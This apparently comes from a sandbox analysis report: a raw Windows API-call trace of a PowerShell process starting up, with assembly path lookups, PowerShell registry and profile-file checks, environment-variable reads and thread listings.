	[0874.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.983] VirtualQuery (in: lpAddress=0x22baf0, lpBuffer=0x22c9b0, dwLength=0x30 | out: lpBuffer=0x22c9b0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0874.988] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0874.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.988] CoTaskMemFree (pv=0x3cead0) 
	[0875.016] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0875.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.016] CoTaskMemFree (pv=0x3cead0) 
	[0875.022] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0875.022] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.022] CoTaskMemFree (pv=0x3cead0) 
	[0875.026] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0875.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.026] CoTaskMemFree (pv=0x3cead0) 
	[0875.780] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0875.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.780] CoTaskMemFree (pv=0x3cead0) 
	[0875.787] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0875.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.788] CoTaskMemFree (pv=0x3cead0) 
	[0875.789] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0875.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.790] CoTaskMemFree (pv=0x3cead0) 
	[0875.797] VirtualQuery (in: lpAddress=0x22baf0, lpBuffer=0x22c9b0, dwLength=0x30 | out: lpBuffer=0x22c9b0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0876.838] VirtualQuery (in: lpAddress=0x22baf0, lpBuffer=0x22c9b0, dwLength=0x30 | out: lpBuffer=0x22c9b0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0876.855] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0876.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0876.855] CoTaskMemFree (pv=0x3cead0) 
	[0879.742] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3cef10
	[0879.745] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3cf020
	[0887.234] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.234] CoTaskMemFree (pv=0x3cf130) 
	[0887.245] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.245] CoTaskMemFree (pv=0x3cf130) 
	[0887.258] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dbf8 | out: phkResult=0x22dbf8*=0x388) returned 0x0
	[0887.258] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22db7c, lpData=0x0, lpcbData=0x22db78*=0x0 | out: lpType=0x22db7c*=0x1, lpData=0x0, lpcbData=0x22db78*=0x56) returned 0x0
	[0887.258] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8af0
	[0887.258] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22db4c, lpData=0x1b9e8af0, lpcbData=0x22db48*=0x56 | out: lpType=0x22db4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22db48*=0x56) returned 0x0
	[0887.258] CoTaskMemFree (pv=0x1b9e8af0) 
	[0887.258] RegCloseKey (hKey=0x388) returned 0x0
	[0887.258] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dbf8 | out: phkResult=0x22dbf8*=0x388) returned 0x0
	[0887.258] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22db7c, lpData=0x0, lpcbData=0x22db78*=0x0 | out: lpType=0x22db7c*=0x1, lpData=0x0, lpcbData=0x22db78*=0x56) returned 0x0
	[0887.258] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8af0
	[0887.258] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22db4c, lpData=0x1b9e8af0, lpcbData=0x22db48*=0x56 | out: lpType=0x22db4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22db48*=0x56) returned 0x0
	[0887.258] CoTaskMemFree (pv=0x1b9e8af0) 
	[0887.258] RegCloseKey (hKey=0x388) returned 0x0
	[0887.259] CoTaskMemAlloc (cb=0x20c) returned 0x1b9dc530
	[0887.259] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b9dc530 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0887.259] CoTaskMemFree (pv=0x1b9dc530) 
	[0887.259] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0887.259] CoTaskMemAlloc (cb=0x20c) returned 0x1b9dc530
	[0887.259] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b9dc530 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0887.259] CoTaskMemFree (pv=0x1b9dc530) 
	[0887.259] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0887.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0887.261] SetErrorMode (uMode=0x1) returned 0x1
	[0887.261] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22db60 | out: lpFileInformation=0x22db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.261] SetErrorMode (uMode=0x1) returned 0x1
	[0887.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0887.261] SetErrorMode (uMode=0x1) returned 0x1
	[0887.261] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22db60 | out: lpFileInformation=0x22db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.262] SetErrorMode (uMode=0x1) returned 0x1
	[0887.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0887.262] SetErrorMode (uMode=0x1) returned 0x1
	[0887.262] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22db60 | out: lpFileInformation=0x22db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.262] SetErrorMode (uMode=0x1) returned 0x1
	[0887.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22d950, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0887.262] SetErrorMode (uMode=0x1) returned 0x1
	[0887.262] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22db60 | out: lpFileInformation=0x22db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0887.262] SetErrorMode (uMode=0x1) returned 0x1
	[0887.265] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.265] CoTaskMemFree (pv=0x3cf130) 
	[0887.266] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.266] CoTaskMemFree (pv=0x3cf130) 
	[0887.267] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.267] CoTaskMemFree (pv=0x3cf130) 
	[0887.267] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.268] CoTaskMemFree (pv=0x3cf130) 
	[0887.268] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.268] CoTaskMemFree (pv=0x3cf130) 
	[0887.269] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.270] CoTaskMemFree (pv=0x3cf130) 
	[0887.961] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0887.961] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x22dd40 | out: lpMode=0x22dd40) returned 1
	[0887.962] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.962] CoTaskMemFree (pv=0x3cf130) 
	[0887.963] SetEvent (hEvent=0x38c) returned 1
	[0887.963] SetEvent (hEvent=0x388) returned 1
	[0887.963] SetEvent (hEvent=0x2f4) returned 1
	[0887.963] SetEvent (hEvent=0x2f8) returned 1
	[0887.965] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0887.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.965] CoTaskMemFree (pv=0x3cf130) 
	[0887.965] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x22da98 | out: phkResult=0x22da98*=0x340) returned 0x0
	[0887.965] RegQueryValueExW (in: hKey=0x340, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x22da1c, lpData=0x0, lpcbData=0x22da18*=0x0 | out: lpType=0x22da1c*=0x0, lpData=0x0, lpcbData=0x22da18*=0x0) returned 0x2

Thread:
	id = 431
	os_tid = 0x10a8


Thread:
	id = 434
	os_tid = 0x10b4


Thread:
	id = 1193
	os_tid = 0x1b08


Thread:
	id = 1196
	os_tid = 0x12d4


Thread:
	id = 1204
	os_tid = 0x1830


Thread:
	id = 1268
	os_tid = 0x1ca0


Thread:
	id = 1274
	os_tid = 0x1cc4


Thread:
	id = 1282
	os_tid = 0x1cec

	[0648.715] CoGetContextToken (in: pToken=0x1b6df490 | out: pToken=0x1b6df490) returned 0x0
	[0648.715] CObjectContext::QueryInterface () returned 0x0
	[0648.716] CObjectContext::GetCurrentThreadType () returned 0x0
	[0648.716] Release () returned 0x0
	[0648.716] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0782.614] RegCloseKey (hKey=0x2f8) returned 0x0
	[0782.615] RegCloseKey (hKey=0x2f4) returned 0x0
	[0782.615] RegCloseKey (hKey=0x2f0) returned 0x0
	[0811.704] LocalFree (hMem=0x3d7290) returned 0x0
	[0811.705] RegCloseKey (hKey=0x2f8) returned 0x0
	[0811.705] LocalFree (hMem=0x3d72c0) returned 0x0
	[0811.705] CloseHandle (hObject=0x2f4) returned 1
	[0811.705] CloseHandle (hObject=0x13) returned 1
	[0811.706] CloseHandle (hObject=0xf) returned 1
	[0831.172] RegCloseKey (hKey=0x2f4) returned 0x0
	[0875.000] RegCloseKey (hKey=0x360) returned 0x0
	[0875.000] RegCloseKey (hKey=0x39c) returned 0x0
	[0875.000] RegCloseKey (hKey=0x37c) returned 0x0
	[0875.001] RegCloseKey (hKey=0x378) returned 0x0
	[0875.001] RegCloseKey (hKey=0x374) returned 0x0
	[0875.001] RegCloseKey (hKey=0x370) returned 0x0
	[0875.002] RegCloseKey (hKey=0x36c) returned 0x0
	[0875.002] RegCloseKey (hKey=0x368) returned 0x0
	[0875.002] RegCloseKey (hKey=0x364) returned 0x0
	[0875.006] RegCloseKey (hKey=0x33c) returned 0x0
	[0875.006] RegCloseKey (hKey=0x398) returned 0x0
	[0875.006] RegCloseKey (hKey=0x394) returned 0x0
	[0875.007] RegCloseKey (hKey=0x35c) returned 0x0
	[0875.007] RegCloseKey (hKey=0x358) returned 0x0
	[0875.007] RegCloseKey (hKey=0x354) returned 0x0
	[0875.008] RegCloseKey (hKey=0x350) returned 0x0
	[0875.008] RegCloseKey (hKey=0x34c) returned 0x0
	[0875.008] RegCloseKey (hKey=0x348) returned 0x0
	[0875.009] RegCloseKey (hKey=0x344) returned 0x0
	[0875.009] RegCloseKey (hKey=0x340) returned 0x0
	[0875.009] RegCloseKey (hKey=0x390) returned 0x0
	[0875.010] RegCloseKey (hKey=0x330) returned 0x0
	[0875.010] RegCloseKey (hKey=0x32c) returned 0x0
	[0875.010] RegCloseKey (hKey=0x328) returned 0x0
	[0875.011] RegCloseKey (hKey=0x324) returned 0x0
	[0875.011] RegCloseKey (hKey=0x320) returned 0x0
	[0875.011] RegCloseKey (hKey=0x31c) returned 0x0
	[0875.012] RegCloseKey (hKey=0x318) returned 0x0
	[0875.012] RegCloseKey (hKey=0x314) returned 0x0
	[0875.012] RegCloseKey (hKey=0x38c) returned 0x0
	[0875.012] RegCloseKey (hKey=0x2f8) returned 0x0
	[0875.012] RegCloseKey (hKey=0x2f4) returned 0x0
	[0875.013] RegCloseKey (hKey=0x388) returned 0x0
	[0875.013] RegCloseKey (hKey=0x384) returned 0x0
	[0892.127] RegCloseKey (hKey=0x340) returned 0x0

Thread:
	id = 1459
	os_tid = 0x1724


Thread:
	id = 1687
	os_tid = 0x1b08


Thread:
	id = 1978
	os_tid = 0x26d0

	[0888.339] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0888.343] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0888.348] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.348] CoTaskMemFree (pv=0x3cf130) 
	[0888.349] VirtualQuery (in: lpAddress=0x1c7bdc40, lpBuffer=0x1c7beb00, dwLength=0x30 | out: lpBuffer=0x1c7beb00*(BaseAddress=0x1c7bd000, AllocationBase=0x1be30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0888.352] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.352] CoTaskMemFree (pv=0x3cf130) 
	[0888.354] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.354] CoTaskMemFree (pv=0x3cf130) 
	[0888.356] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.356] CoTaskMemFree (pv=0x3cf130) 
	[0888.364] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.364] CoTaskMemFree (pv=0x3cf130) 
	[0888.365] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.365] CoTaskMemFree (pv=0x3cf130) 
	[0888.367] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.367] CoTaskMemFree (pv=0x3cf130) 
	[0888.370] VirtualQuery (in: lpAddress=0x1c7bdef0, lpBuffer=0x1c7bedb0, dwLength=0x30 | out: lpBuffer=0x1c7bedb0*(BaseAddress=0x1c7bd000, AllocationBase=0x1be30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0888.371] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.371] CoTaskMemFree (pv=0x3cf130) 
	[0888.373] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.373] CoTaskMemFree (pv=0x3cf130) 
	[0888.373] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.373] CoTaskMemFree (pv=0x3cf130) 
	[0888.374] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.374] CoTaskMemFree (pv=0x3cf130) 
	[0888.809] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0888.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.809] CoTaskMemFree (pv=0x3cf130) 
	[0889.281] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.281] CoTaskMemFree (pv=0x3cf130) 
	[0889.283] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.283] CoTaskMemFree (pv=0x3cf130) 
	[0889.285] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.285] CoTaskMemFree (pv=0x3cf130) 
	[0889.288] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.288] CoTaskMemFree (pv=0x3cf130) 
	[0889.289] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.290] CoTaskMemFree (pv=0x3cf130) 
	[0889.291] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.291] CoTaskMemFree (pv=0x3cf130) 
	[0889.293] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.293] CoTaskMemFree (pv=0x3cf130) 
	[0889.763] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0889.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0889.763] CoTaskMemFree (pv=0x3cf130) 
	[0890.801] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0890.801] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0890.801] CoTaskMemFree (pv=0x3cf130) 
	[0890.804] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0890.804] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0890.804] CoTaskMemFree (pv=0x3cf130) 
	[0890.804] CoTaskMemAlloc (cb=0x128) returned 0x3d1180
	[0890.804] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3d1180, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0890.805] CoTaskMemFree (pv=0x3d1180) 
	[0890.810] CoTaskMemAlloc (cb=0x20e) returned 0x1b9ddf70
	[0890.810] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b9ddf70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0890.810] CoTaskMemFree (pv=0x1b9ddf70) 
	[0890.814] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0890.815] SetErrorMode (uMode=0x1) returned 0x1
